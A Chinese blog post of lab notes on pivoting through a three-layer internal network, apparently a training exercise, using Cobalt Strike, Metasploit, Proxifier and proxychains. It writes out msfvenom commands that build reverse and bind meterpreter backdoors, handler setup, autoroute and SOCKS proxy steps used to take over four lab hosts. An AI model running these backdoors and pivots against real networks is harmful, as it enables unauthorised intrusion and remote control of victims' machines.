三层网络无防火墙穿透

CV小迪的拓扑图

本次实验的知识点

0、解决网络通信问题

1、熟悉cs,msf工具的使用

2、如何建立socks代理

3、正向反向连接

CS&Proxifier操作

环节一

1、连接cs

2、生成并上传反向连接的后门 

3、建立SOCKS代理

利用工具连接代理

proxifier

socks4a  没有用户和密码的代理

socks5  有用户和密码的代理

端口填cs上建立的端口

目标主机填写访问什么IP时用到这个代理

应用程序就是使用什么应用程序时启动这个代理 

火狐代理插件 

建立代理但是没有启用时

建立代理并启用时在物理机上访问目标内网的网站

并且可以使用本地fscan工具进行扫描

环节2

接着上线192.168.2.22IP的主机

新增监听器

这个生成的木马作用是监听本地4444端口

生成正向木马,用来正向连接,正向上线

查看没有运行木马前端口的开放情况

运行后的结果

connect 192.168.2.22 4444 利用第一台拿下的主机去正向连接192.168.2.22这台内网主机

重复之前的步骤创建socks代理

最终拿下四台主机的权限,并且可以建立通讯

MSF&proxychains4操作命令:

配置反向上线:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.147 LPORT=3333 -f exe -o msf.exe

生成反向连接到192.168.139.147 3333端口的exe后门

use exploit/multi/handler

使用模块

set payload windows/meterpreter/reverse_tcp

设置payload

set lhost 0.0.0.0

set lport 3333

run

查看路由表:

run autoroute -p

run post/multi/manage/autoroute

创建socks节点:

background

auxiliary/server/socks_proxy

配置IP,端口,版本

配置正向上线:

msfvenom -p windows/meterpreter/bind_tcp LPORT=1234 -f exe -o z.exe

生成一个正向后门

use exploit/multi/handler

set payload windows/meterpreter/bind_tcp

set rhost xx.xx.xx.xx

set lport 6666

run

86   use exploit/multi/handler
87   set payload windows/meterpreter/reverse_tcp
88   set lport 3333
89   set lhost 0.0.0.0
90   run
设置反向模块,反向连接等待
91   sessions 1
92   use auxiliary/server/socks_proxy
93   show options
94   set srvport 4545
95   run
设置socks代理,本地4545端口
96   use exploit/multi/handler
97   set payload windows/meterpreter/bind_tcp
98   set rhost 192.168.2.22
99   set lport 1234
100  run
设置正向模块,正向连接主动连接

101  sessions list

配置socks代理

kali种自带

在/etc底下搜索

只需要更改这里

配置好后可以访问2网段的内容

生成正向木马

msfvenom -p windows/meterpreter/bind_tcp LPORT=1234 -f exe -o z.exe

配置正向模块

在192.168.2.22IP主机上运行后门

上线

上线后继续配置socks代理

最终拿下

         

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值